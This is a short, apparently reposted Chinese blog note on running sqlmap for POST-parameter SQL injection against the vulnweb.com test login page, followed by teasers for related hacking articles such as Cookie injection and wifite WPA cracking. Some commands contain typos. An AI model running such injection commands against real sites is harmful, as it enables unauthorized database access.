sqlmap post注入

转载 2015年11月19日 02:32:16

0x00 常用的

注入点:http://tetasp.vulnweb.com/Login.asp

几种注入方式: sqlmap -r search-test.txt -p tfUPass

其中search-test.txt的内容为以下所抓的post包

0x01 常参数的

sqlmap -r search-test.txt -p tfUPss

0x02 常参数的

sqlmap -u http://testasp.vulnweb.com/Login.asp --froms

0x03 指定一个参数的方法

sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=11&tfUPass=13"

相关文章推荐

SQL连载(一)----简介

一、SQL简介 SQL语言,是结构化查询语言(Structured Query Language)的简称、SQL语言是一种数据库查询和程序设计语言、用于存取数据以及查询、更新和管理关系数据库...

SQL连载(三)----SQL语法

这一篇文章主要讲解一些SQL的一些基本语法: 1、SQL 的语法并不按照语法顺序执行 SQL 语句有一个让大部分人都感到困惑的特性,就是:SQL 语句的执行顺序跟其语句的语法顺序并不一致。...

Kali-WIFI攻防(一)----无线网络嗅探工具Kismet

一、工具简介 Kismet是802.11二层无线网络探测器,嗅探器和入侵检测系统。它将与支持原始监视(rfmon)模式中的任何无线网卡的工作,并能嗅出的802.11a / b / g / n的流量...

SQL注入系列之ASP+ACCESS手动注入(二)----Cookie注入

一、简介 Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号...

SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)

一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的...

Windows10安装sqlmap

一、所需软件 sqlmap简介 Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、...

sqlmap的POST注入

第一种方式, 就是让sqlmap去自动获取表单: sqlmap -u "http://www.xxxxxxxx.gov.cn/bxcxnew1.aspx" --forms 一般情况下就一直...

Python运行scrapy报错:ImportError: No module named win32api

一、问题描述 运行scrapy项目就报错:ImportError: No module named win32api 找不到win32api模块。。。 二、解决方法...

Kali-WIFI攻防(三)----wifite自动化WEP/WPA破解工具

一、工具简介 wifite是一款自动化wep、wpa破解工具,不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运...

复合主键与联合主键

一、复合主键   所谓的复合主键 就是指你表的主键含有一个以上的字段组成,不使用无业务含义的自增id作为主键。 比如  create table test ( name varchar...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)